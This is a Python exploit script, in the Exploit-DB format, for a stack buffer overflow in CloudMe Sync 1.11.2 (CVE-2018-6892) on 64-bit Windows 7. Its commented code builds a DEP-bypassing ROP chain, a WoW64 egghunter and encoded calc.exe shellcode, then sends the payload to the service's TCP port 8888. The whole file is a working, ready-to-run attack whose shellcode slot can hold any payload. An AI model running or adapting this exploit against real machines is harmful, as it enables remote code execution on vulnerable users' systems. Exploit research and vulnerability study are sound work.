# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact: https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218

import socket
import struct

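def create_rop_chain():
    """Return the DEP-bypass ROP chain as a little-endian packed byte string.

    Chain generated with mona.py (www.corelan.be). It resolves VirtualProtect()
    through the Qt5Core import table, stages the four call arguments in
    registers and finishes with PUSHAD # RETN, which turns the register set into
    a call frame: PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so from the new
    ESP upwards the stack reads EDI (ROP NOP), ESI (VirtualProtect), EBP (return
    address = jmp esp), ESP (lpAddress), EBX (dwSize), EDX (flNewProtect),
    ECX (lpflOldProtect). When VirtualProtect() returns into `jmp esp`,
    execution lands in whatever was placed right after this chain.

    Every entry is an absolute address inside the DLLs bundled with CloudMe
    Sync 1.11.2 as loaded on the tested Windows 7 SP1 x64 host; another build,
    a rebased module or a different Qt version invalidates the whole chain and
    it has to be regenerated.
    """
    rop_gadgets = [
        # ESI = VirtualProtect: read the pointer out of the IAT rather than
        # hard-coding a kernel32 address that ASLR would move.
        0x61ba8b5e,  # POP EAX # RETN [Qt5Gui.dll]
        0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
        0x61bdd7f5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
        0x68aef542,  # XCHG EAX,ESI # RETN [Qt5Core.dll]
        # EBP = where VirtualProtect() returns to: a jmp esp into the next stage.
        0x68bfe66b,  # POP EBP # RETN [Qt5Core.dll]
        0x68f82223,  # & jmp esp [Qt5Core.dll]
        # EBX = dwSize = 0x201. Built with NEG/INC/ADD, presumably so that the
        # small constant never appears as a null-containing dword in the chain.
        0x6d9f7736,  # POP EDX # RETN [Qt5Sql.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x61e870e0,  # POP EBX # RETN [Qt5Gui.dll]
        0xffffffff,  # EBX = -1; INC makes it 0, so ADD leaves EBX == EDX == 0x201
        0x6204f463,  # INC EBX # RETN [Qt5Gui.dll]
        0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
        # EDX = flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE), same NEG trick.
        0x61ec44ae,  # POP EDX # RETN [Qt5Gui.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        # ECX = lpflOldProtect: any writable dword the API can store into.
        0x61e2a807,  # POP ECX # RETN [Qt5Gui.dll]
        0x6eb573c9,  # &Writable location [libgcc_s_dw2-1.dll]
        # EDI = ROP NOP (first thing RETN pops after PUSHAD), EAX = filler.
        0x61e85d66,  # POP EDI # RETN [Qt5Gui.dll]
        0x6d9e431c,  # RETN (ROP NOP) [Qt5Sql.dll]
        0x61ba8ce5,  # POP EAX # RETN [Qt5Gui.dll]
        0x90909090,  # nop
        0x61b6b8d0,  # PUSHAD # RETN [Qt5Gui.dll]
    ]
    # b"" keeps this working on Python 3, where struct.pack() returns bytes and
    # "".join() over them raises TypeError; on Python 2 b"" and "" are the same.
    return b"".join(struct.pack("<I", gadget) for gadget in rop_gadgets)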

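rop_chain = create_rop_chain()

# Where the payload is delivered; the PoC targets a local install.
target = "127.0.0.1"

# Payload layout, in send order:
#   1052 bytes of filler up to the saved return address,
#   the overwritten EIP, 12 bytes of NOP, the ROP chain (makes the stack
#   executable and jmp esp's into what follows), the WoW64 egghunter, and
#   finally the doubled "w00t" tag followed by the shellcode the hunter looks
#   for.  The hunter exists because the space reachable right after the chain
#   is too small for the full payload; the tagged copy can live anywhere in
#   the process.
# All pieces are bytes literals: the original text had lost the backslashes of
# its \x escapes, which would have sent the ASCII text "xfcx57..." instead of
# the bytes.  b"" is also what Python 3 needs for socket.send(); on Python 2
# b"" and "" are the same type.
junk = b"A" * 1052

# Overwritten return address, 0x61ea57fc little-endian.  The gadget is not
# annotated in the original; presumably it steps over the 12 NOP bytes and
# returns into the chain.  Like the chain it is an absolute address in a
# CloudMe 1.11.2 DLL and is only valid for that build.
eip = b"\xfc\x57\xea\x61"  # 0x61ea57fc
nops = b"\x90\x90\x90\x90"

# WoW64-aware egghunter.  It disassembles to the well-known Corelan WoW64
# hunter: `mov bx,cs / cmp bl,0x23` decides whether it runs as 32-bit code on a
# 64-bit kernel, then walks memory one page at a time (`or dx,0xfff / inc edx`)
# and probes each page with a syscall -- `int 0x2e` on native x86, a call
# through fs:[0xC0] (the WoW64 far-jump slot) on x64 -- so unmapped pages do
# not crash it.  When the 4-byte tag "w00t" is found twice back to back it
# does `jmp edi` into the bytes after the tag.  Verify against the reference
# listing before re-encoding any of this.
egg64 = (
    b"\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
    b"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
    b"\x2e\x5a\x3c\x05\x74\xea\xb8"
    b"\x77\x30\x30\x74"  # tag w00t
    b"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
    b"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf"
)

# Shellcode calc.exe (220 bytes).  The `fnstenv [esp-0xc]` GetPC prologue in
# the first dword suggests an msfvenom-encoded blob rather than raw shellcode;
# regenerate it (and the tag) if the target or bad-character set changes.
shellcode = (
    b"\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
    b"\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
    b"\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
    b"\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
    b"\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
    b"\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
    b"\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
    b"\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
    b"\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
    b"\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
    b"\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
    b"\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
    b"\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
    b"\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
    b"\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
    b"\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
    b"\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
)

payload = (
    junk
    + eip
    + nops * 3
    + rop_chain
    + nops * 4
    + egg64
    + nops * 4
    + b"w00tw00t"  # the doubled tag the egghunter scans for
    + shellcode
)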

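# Deliver the payload to the CloudMe listener on TCP/8888.
# The socket is created outside the try so the finally can always close it;
# Python 2 sockets have no context manager, which is why `with` is not used.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, 8888))
    # sendall() keeps sending until every byte is queued; send() may return a
    # short count and silently truncate the overflow.
    s.sendall(payload)
except socket.error as exc:
    # socket.error is OSError on Python 3 and the socket exception on Python 2,
    # so this stays narrow on both instead of the original bare except, which
    # also hid NameErrors and typos behind "Crashed!".  A refused connection and
    # a reset after the overflow both land here; the error text tells them apart.
    print("Crashed! (%s)" % exc)
finally:
    s.close()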